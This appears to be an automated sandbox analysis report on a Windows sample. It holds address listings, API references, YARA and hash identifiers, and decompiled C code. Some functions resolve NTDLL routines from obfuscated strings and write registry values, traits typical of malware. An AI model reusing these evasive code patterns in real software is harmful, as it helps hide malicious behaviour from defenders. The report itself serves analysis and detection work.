                                                                                                                                                                                                                                0x736ddc6e
                                                                                                                                                                                                                                0x736ddc72
                                                                                                                                                                                                                                0x736ddc72
                                                                                                                                                                                                                                0x736ddc78
                                                                                                                                                                                                                                0x736ddc7e
                                                                                                                                                                                                                                0x736ddc81
                                                                                                                                                                                                                                0x736ddc89
                                                                                                                                                                                                                                0x736ddc90
                                                                                                                                                                                                                                0x736ddc94
                                                                                                                                                                                                                                0x736ddc95
                                                                                                                                                                                                                                0x736ddc98
                                                                                                                                                                                                                                0x736ddc99
                                                                                                                                                                                                                                0x736ddcdd
                                                                                                                                                                                                                                0x736ddcdd
                                                                                                                                                                                                                                0x736ddce1
                                                                                                                                                                                                                                0x736ddce2
                                                                                                                                                                                                                                0x736ddce7
                                                                                                                                                                                                                                0x736ddced
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddcf3
                                                                                                                                                                                                                                0x736ddcf7
                                                                                                                                                                                                                                0x736ddd80
                                                                                                                                                                                                                                0x736ddd87
                                                                                                                                                                                                                                0x736ddd8f
                                                                                                                                                                                                                                0x736ddd97
                                                                                                                                                                                                                                0x736ddd9c
                                                                                                                                                                                                                                0x736ddd9f
                                                                                                                                                                                                                                0x736ddda4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dddaa
                                                                                                                                                                                                                                0x736dddbf
                                                                                                                                                                                                                                0x736ddea3
                                                                                                                                                                                                                                0x736ddea9
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dddc5
                                                                                                                                                                                                                                0x736dddce
                                                                                                                                                                                                                                0x736dddd0
                                                                                                                                                                                                                                0x736dddd6
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddddc
                                                                                                                                                                                                                                0x736ddde0
                                                                                                                                                                                                                                0x736dde16
                                                                                                                                                                                                                                0x736dde19
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dde1f
                                                                                                                                                                                                                                0x736dde1f
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dde1f
                                                                                                                                                                                                                                0x736ddde2
                                                                                                                                                                                                                                0x736ddde4
                                                                                                                                                                                                                                0x736ddde6
                                                                                                                                                                                                                                0x736dddff
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dde05
                                                                                                                                                                                                                                0x736dde09
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dde0f
                                                                                                                                                                                                                                0x736dde0f
                                                                                                                                                                                                                                0x736dde12
                                                                                                                                                                                                                                0x736dde13
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dde13
                                                                                                                                                                                                                                0x736dde09
                                                                                                                                                                                                                                0x736dddff
                                                                                                                                                                                                                                0x736ddde0
                                                                                                                                                                                                                                0x736dddd6
                                                                                                                                                                                                                                0x736dddbf
                                                                                                                                                                                                                                0x736ddda4
                                                                                                                                                                                                                                0x736ddced
                                                                                                                                                                                                                                0x736ddc16
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddcfe
                                                                                                                                                                                                                                0x736ddcfe
                                                                                                                                                                                                                                0x736ddd01
                                                                                                                                                                                                                                0x736ddd05
                                                                                                                                                                                                                                0x736ddd08
                                                                                                                                                                                                                                0x736ddd2a
                                                                                                                                                                                                                                0x736ddd2d
                                                                                                                                                                                                                                0x736ddd32
                                                                                                                                                                                                                                0x736ddd36
                                                                                                                                                                                                                                0x736ddd3a
                                                                                                                                                                                                                                0x736ddd68
                                                                                                                                                                                                                                0x736ddd6a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddd3c
                                                                                                                                                                                                                                0x736ddd3c
                                                                                                                                                                                                                                0x736ddd3f
                                                                                                                                                                                                                                0x736ddd42
                                                                                                                                                                                                                                0x736ddd45
                                                                                                                                                                                                                                0x736dde80
                                                                                                                                                                                                                                0x736dde83
                                                                                                                                                                                                                                0x736dde86
                                                                                                                                                                                                                                0x736dde90
                                                                                                                                                                                                                                0x736dde9b
                                                                                                                                                                                                                                0x736ddea0
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddd4b
                                                                                                                                                                                                                                0x736ddd52
                                                                                                                                                                                                                                0x736ddd57
                                                                                                                                                                                                                                0x736ddd5a
                                                                                                                                                                                                                                0x736ddd5d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddd63
                                                                                                                                                                                                                                0x736ddd63
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddd63
                                                                                                                                                                                                                                0x736ddd5d
                                                                                                                                                                                                                                0x736ddd45
                                                                                                                                                                                                                                0x736ddd0a
                                                                                                                                                                                                                                0x736ddd0e
                                                                                                                                                                                                                                0x736ddd11
                                                                                                                                                                                                                                0x736ddd16
                                                                                                                                                                                                                                0x736ddd1c
                                                                                                                                                                                                                                0x736ddd1e
                                                                                                                                                                                                                                0x736ddd25
                                                                                                                                                                                                                                0x736ddd6b
                                                                                                                                                                                                                                0x736ddd6e
                                                                                                                                                                                                                                0x736ddd6f
                                                                                                                                                                                                                                0x736ddd74
                                                                                                                                                                                                                                0x736ddd77
                                                                                                                                                                                                                                0x736ddd7a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddd7a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddd08
                                                                                                                                                                                                                                0x736ddba9
                                                                                                                                                                                                                                0x736ddeaf
                                                                                                                                                                                                                                0x736ddeaf
                                                                                                                                                                                                                                0x736ddeb1
                                                                                                                                                                                                                                0x736ddeb4
                                                                                                                                                                                                                                0x736ddeb4
                                                                                                                                                                                                                                0x736ddeb4
                                                                                                                                                                                                                                0x736ddeb4
                                                                                                                                                                                                                                0x736ddec6
                                                                                                                                                                                                                                0x736ddec8
                                                                                                                                                                                                                                0x736ddec9
                                                                                                                                                                                                                                0x736ddeca
                                                                                                                                                                                                                                0x736dded6

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 736DDB73
                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 736DDD52
                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 736DDD6F
                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,736DC31E,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 736DDDB7
                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 736DDDF7
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 736DDEA3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4031098158-0
                                                                                                                                                                                                                                • Opcode ID: 69f75a8ef814a51c41fe9b03306741acfb950da0c224c19a53e6fe6e68daeb38
                                                                                                                                                                                                                                • Instruction ID: 478704e6cb27ff5b10fd0181870b68765d82861f3ddcd779b127fcb5b8cdcf05
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69f75a8ef814a51c41fe9b03306741acfb950da0c224c19a53e6fe6e68daeb38
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4D1CE76D112989FDF11DFE8C980AEDBBB5FF49310F28015AE956BB281D730A906CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A810E9, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00A81143
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(0070006F), ref: 00A81157
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00A81169
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A811D1
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A811E0
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A811EB
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$AllocFree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 344208780-0
                                                                                                                                                                                                                                • Opcode ID: 852c3dc1b5e252e96943694b541037fd26e9bd57abcd941e58fa24be64086fcd
                                                                                                                                                                                                                                • Instruction ID: 9a28e17fc066ff0f5fe405a8d4a945a2d0a161d230ba1c84f1930edeb79b4e46
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 852c3dc1b5e252e96943694b541037fd26e9bd57abcd941e58fa24be64086fcd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A415336D00609AFDB01EFF8D844AAEB7B9EF49310F144525EE10EB160DA719D06CBA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A86856, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A86856(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00A85157(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xa8d2e0; // 0x105a5a8
					_t1 = _t23 + 0xa8e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0xa8d2e0; // 0x105a5a8
					_t2 = _t26 + 0xa8e782; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00A853BB(_t54);
					} else {
						_t30 =  *0xa8d2e0; // 0x105a5a8
						_t5 = _t30 + 0xa8e76f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xa8d2e0; // 0x105a5a8
							_t7 = _t33 + 0xa8e4ce; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xa8d2e0; // 0x105a5a8
								_t9 = _t36 + 0xa8e406; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xa8d2e0; // 0x105a5a8
									_t11 = _t39 + 0xa8e792; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00A85C55(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                                                                                                                                                                                                0x00a86865
                                                                                                                                                                                                                                0x00a86869
                                                                                                                                                                                                                                0x00a8692b
                                                                                                                                                                                                                                0x00a8686f
                                                                                                                                                                                                                                0x00a8686f
                                                                                                                                                                                                                                0x00a86874
                                                                                                                                                                                                                                0x00a86887
                                                                                                                                                                                                                                0x00a86889
                                                                                                                                                                                                                                0x00a8688e
                                                                                                                                                                                                                                0x00a86896
                                                                                                                                                                                                                                0x00a8689d
                                                                                                                                                                                                                                0x00a8689f
                                                                                                                                                                                                                                0x00a868a4
                                                                                                                                                                                                                                0x00a86923
                                                                                                                                                                                                                                0x00a86924
                                                                                                                                                                                                                                0x00a868a6
                                                                                                                                                                                                                                0x00a868a6
                                                                                                                                                                                                                                0x00a868ab
                                                                                                                                                                                                                                0x00a868b3
                                                                                                                                                                                                                                0x00a868b5
                                                                                                                                                                                                                                0x00a868ba
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a868bc
                                                                                                                                                                                                                                0x00a868bc
                                                                                                                                                                                                                                0x00a868c1
                                                                                                                                                                                                                                0x00a868c9
                                                                                                                                                                                                                                0x00a868cb
                                                                                                                                                                                                                                0x00a868d0
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a868d2
                                                                                                                                                                                                                                0x00a868d2
                                                                                                                                                                                                                                0x00a868d7
                                                                                                                                                                                                                                0x00a868df
                                                                                                                                                                                                                                0x00a868e1
                                                                                                                                                                                                                                0x00a868e6
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a868e8
                                                                                                                                                                                                                                0x00a868e8
                                                                                                                                                                                                                                0x00a868ed
                                                                                                                                                                                                                                0x00a868f5
                                                                                                                                                                                                                                0x00a868f7
                                                                                                                                                                                                                                0x00a868fc
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a868fe
                                                                                                                                                                                                                                0x00a86904
                                                                                                                                                                                                                                0x00a86909
                                                                                                                                                                                                                                0x00a86910
                                                                                                                                                                                                                                0x00a86915
                                                                                                                                                                                                                                0x00a8691a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8691c
                                                                                                                                                                                                                                0x00a8691f
                                                                                                                                                                                                                                0x00a8691f
                                                                                                                                                                                                                                0x00a8691a
                                                                                                                                                                                                                                0x00a868fc
                                                                                                                                                                                                                                0x00a868e6
                                                                                                                                                                                                                                0x00a868d0
                                                                                                                                                                                                                                0x00a868ba
                                                                                                                                                                                                                                0x00a868a4
                                                                                                                                                                                                                                0x00a86939

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00A874C1,?,00000001,?,?,00000000,00000000), ref: 00A8687B
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00A8689D
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00A868B3
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00A868C9
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00A868DF
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00A868F5
                                                                                                                                                                                                                                  • Part of subcall function 00A85C55: memset.NTDLL ref: 00A85CD4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1886625739-0
                                                                                                                                                                                                                                • Opcode ID: 1a31e2a11ea68b8ea196b230a250174ce11078c72dca280b4c03d16a74c7079e
                                                                                                                                                                                                                                • Instruction ID: 626b06de849f52cbc75d7d04a82cc7690a12aa96b3146ec95c30b07001bae82c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a31e2a11ea68b8ea196b230a250174ce11078c72dca280b4c03d16a74c7079e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E212CB590060AEFE710EFA9DD44EAABBFCEF043547004065F959C7251E770E906CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D8137, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                                                                                                			E736D8137(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x736eb020 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E736D898D(_t13, __eflags,  *0x736eb020);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E736D89C8(_t14, __eflags,  *0x736eb020, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E736D9908();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E736D89C8(_t18, __eflags,  *0x736eb020, 0);
								} else {
									_t8 = E736D89C8(_t18, __eflags,  *0x736eb020, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E736D9721(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}












                                                                                                                                                                                                                                0x736d8137
                                                                                                                                                                                                                                0x736d813e
                                                                                                                                                                                                                                0x736d8151
                                                                                                                                                                                                                                0x736d8158
                                                                                                                                                                                                                                0x736d815a
                                                                                                                                                                                                                                0x736d815b
                                                                                                                                                                                                                                0x736d815e
                                                                                                                                                                                                                                0x736d8177
                                                                                                                                                                                                                                0x736d8177
                                                                                                                                                                                                                                0x736d8160
                                                                                                                                                                                                                                0x736d8160
                                                                                                                                                                                                                                0x736d8162
                                                                                                                                                                                                                                0x736d816c
                                                                                                                                                                                                                                0x736d8173
                                                                                                                                                                                                                                0x736d8175
                                                                                                                                                                                                                                0x736d817c
                                                                                                                                                                                                                                0x736d8185
                                                                                                                                                                                                                                0x736d8188
                                                                                                                                                                                                                                0x736d8189
                                                                                                                                                                                                                                0x736d818b
                                                                                                                                                                                                                                0x736d819f
                                                                                                                                                                                                                                0x736d819f
                                                                                                                                                                                                                                0x736d81a8
                                                                                                                                                                                                                                0x736d818d
                                                                                                                                                                                                                                0x736d8194
                                                                                                                                                                                                                                0x736d819a
                                                                                                                                                                                                                                0x736d819b
                                                                                                                                                                                                                                0x736d819d
                                                                                                                                                                                                                                0x736d81b1
                                                                                                                                                                                                                                0x736d81b3
                                                                                                                                                                                                                                0x736d81b3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d819d
                                                                                                                                                                                                                                0x736d81b6
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d8175
                                                                                                                                                                                                                                0x736d8162
                                                                                                                                                                                                                                0x736d81be
                                                                                                                                                                                                                                0x736d81c8
                                                                                                                                                                                                                                0x736d8140
                                                                                                                                                                                                                                0x736d8142
                                                                                                                                                                                                                                0x736d8142

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000001,?,736D7CA5,736D74C3,736D6EDC,?,736D7114,?,00000001,?,?,00000001,?,736E9A30,0000000C,736D720D), ref: 736D8145
                                                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 736D8153
                                                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 736D816C
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,736D7114,?,00000001,?,?,00000001,?,736E9A30,0000000C,736D720D,?,00000001,?), ref: 736D81BE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                                                                • Opcode ID: ceb11d6aafd2f52919b6237827f5b6992150b922f7a36233ceca5df0772ae9e2
                                                                                                                                                                                                                                • Instruction ID: 02efab8df2a6382d2f725095310dc715f54188fb4d11c6f5fdecb592459af44e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ceb11d6aafd2f52919b6237827f5b6992150b922f7a36233ceca5df0772ae9e2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4301283366C3175EFB052676AC8CB5A2FA8EB05E713300329E129961D5FF22180D5144
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A84847, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                                                                                                			E00A84847(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0xa8d37c);
					_t91 = 0x80000002;
					L6:
					_t59 = E00A83037( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E00A82B5D(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E00A853BB(_a8);
						goto L29;
					}
					_t64 =  *0xa8d2b0; // 0x1ae9bb8
					_t16 = _t64 + 0xc; // 0x1ae9c86
					_t65 = E00A83037(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d00a8c0
						if(E00A89BAF(_t97,  *_t33, _t91, _a8,  *0xa8d374,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0xa8d2e0; // 0x105a5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0xa8ea48; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0xa8ea43; // 0x55434b48
								_t69 = _t34;
							}
							if(E00A85E8A(_t69,  *0xa8d374,  *0xa8d378,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0xa8d2e0; // 0x105a5a8
									_t44 = _t71 + 0xa8e83e; // 0x74666f53
									_t73 = E00A83037(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d00a8c0
										E00A89BED( *_t47, _t91, _a8,  *0xa8d378, _a24);
										_t49 = _t101 + 0x10; // 0x3d00a8c0
										E00A89BED( *_t49, _t91, _t99,  *0xa8d370, _a16);
										E00A853BB(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d00a8c0
									E00A89BED( *_t40, _t91, _a8,  *0xa8d378, _a24);
									_t43 = _t101 + 0x10; // 0x3d00a8c0
									E00A89BED( *_t43, _t91, _a8,  *0xa8d370, _a16);
								}
								if( *_t101 != 0) {
									E00A853BB(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d00a8c0
					_t81 = E00A863D1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d00a8c0
							E00A89BAF(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E00A853BB(_t100);
						_t98 = _a16;
					}
					E00A853BB(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E00A8A929(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0xa8d37c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                                                                                                                                                                                                                                0x00a84847
                                                                                                                                                                                                                                0x00a84850
                                                                                                                                                                                                                                0x00a84857
                                                                                                                                                                                                                                0x00a8485c
                                                                                                                                                                                                                                0x00a848c9
                                                                                                                                                                                                                                0x00a848cf
                                                                                                                                                                                                                                0x00a848d4
                                                                                                                                                                                                                                0x00a848db
                                                                                                                                                                                                                                0x00a848e0
                                                                                                                                                                                                                                0x00a848e5
                                                                                                                                                                                                                                0x00a84a50
                                                                                                                                                                                                                                0x00a84a57
                                                                                                                                                                                                                                0x00a84a57
                                                                                                                                                                                                                                0x00a84a5c
                                                                                                                                                                                                                                0x00a84a5e
                                                                                                                                                                                                                                0x00a84a5e
                                                                                                                                                                                                                                0x00a84a67
                                                                                                                                                                                                                                0x00a84a67
                                                                                                                                                                                                                                0x00a848eb
                                                                                                                                                                                                                                0x00a848f7
                                                                                                                                                                                                                                0x00a84a46
                                                                                                                                                                                                                                0x00a84a49
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a84a49
                                                                                                                                                                                                                                0x00a848fd
                                                                                                                                                                                                                                0x00a84902
                                                                                                                                                                                                                                0x00a84905
                                                                                                                                                                                                                                0x00a8490a
                                                                                                                                                                                                                                0x00a8490f
                                                                                                                                                                                                                                0x00a84958
                                                                                                                                                                                                                                0x00a84958
                                                                                                                                                                                                                                0x00a8496b
                                                                                                                                                                                                                                0x00a84975
                                                                                                                                                                                                                                0x00a8497b
                                                                                                                                                                                                                                0x00a84982
                                                                                                                                                                                                                                0x00a8498c
                                                                                                                                                                                                                                0x00a8498c
                                                                                                                                                                                                                                0x00a84984
                                                                                                                                                                                                                                0x00a84984
                                                                                                                                                                                                                                0x00a84984
                                                                                                                                                                                                                                0x00a84984
                                                                                                                                                                                                                                0x00a849ae
